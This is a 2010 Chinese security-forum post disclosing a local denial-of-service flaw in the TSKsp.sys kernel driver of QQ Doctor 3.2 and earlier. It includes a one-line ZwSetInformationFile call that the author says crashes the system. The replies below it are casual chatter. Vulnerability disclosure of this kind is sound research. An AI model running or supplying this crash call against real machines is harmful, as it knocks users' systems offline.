[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞-编程技术-看雪-安全社区|安全招聘|kanxue.com

[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞

发表于: 2010-2-19 14:36 6165

[原创]QQ医生 <= 3.2 内核驱动程序ZwSetInformationFile HOOK 本地拒绝服务漏洞

zhenzero

2010-2-19 14:36

6165

影响版本:
QQ医生 <= 3.2

发布时间:2010-02-19

漏洞描述：
QQ医生是腾讯公司开发的一个安全辅助工具，其用于实现注册表文件拦截等功能的驱动程序TSKsp.sys没有对ZwSetInformationFile->FileDispostionInformation的参数做任何的检查就直接访问，因此攻击者可构造特殊的参数，使系统蓝屏

利用代码：

ZwSetInformationFile(0 , 0 ,0x80000000 , 0 , FileDispostionInformation );

安装了QQ医生的机器上运行上面一行代码，系统即告蓝屏

[培训]《安卓高级研修班(网课)》月薪三万计划，掌握调试、分析还原ollvm、vmp的方法，定制art虚拟机自动化脱壳的方法

收藏・1

免费・7

支持

最新回复 (3)
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 2 楼楼主是新人还是马甲~~ 2010-2-19 19:14 0
xiilin 雪币： 401 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 35 回帖 792 粉丝 0 关注私信	xiilin 3 楼看起来像新人，呵呵，比我旧一些的那种。 2010-2-19 20:18 0
WHO-AM-I 雪币： 210 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 67 粉丝 1 关注私信	WHO-AM-I 4 楼可能是马甲，我比还老！ 2010-2-22 10:15 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

zhenzero

发帖

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

最新回复 (3)
achillis 雪币： 7651 活跃值： (523) 能力值： ( LV9，RANK：610 ) 在线值：发帖 32 回帖 2032 粉丝 47 关注私信	achillis 15 2 楼楼主是新人还是马甲~~ 2010-2-19 19:14 0
xiilin 雪币： 401 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 35 回帖 792 粉丝 0 关注私信	xiilin 3 楼看起来像新人，呵呵，比我旧一些的那种。 2010-2-19 20:18 0
WHO-AM-I 雪币： 210 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 1 回帖 67 粉丝 1 关注私信	WHO-AM-I 4 楼可能是马甲，我比还老！ 2010-2-22 10:15 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复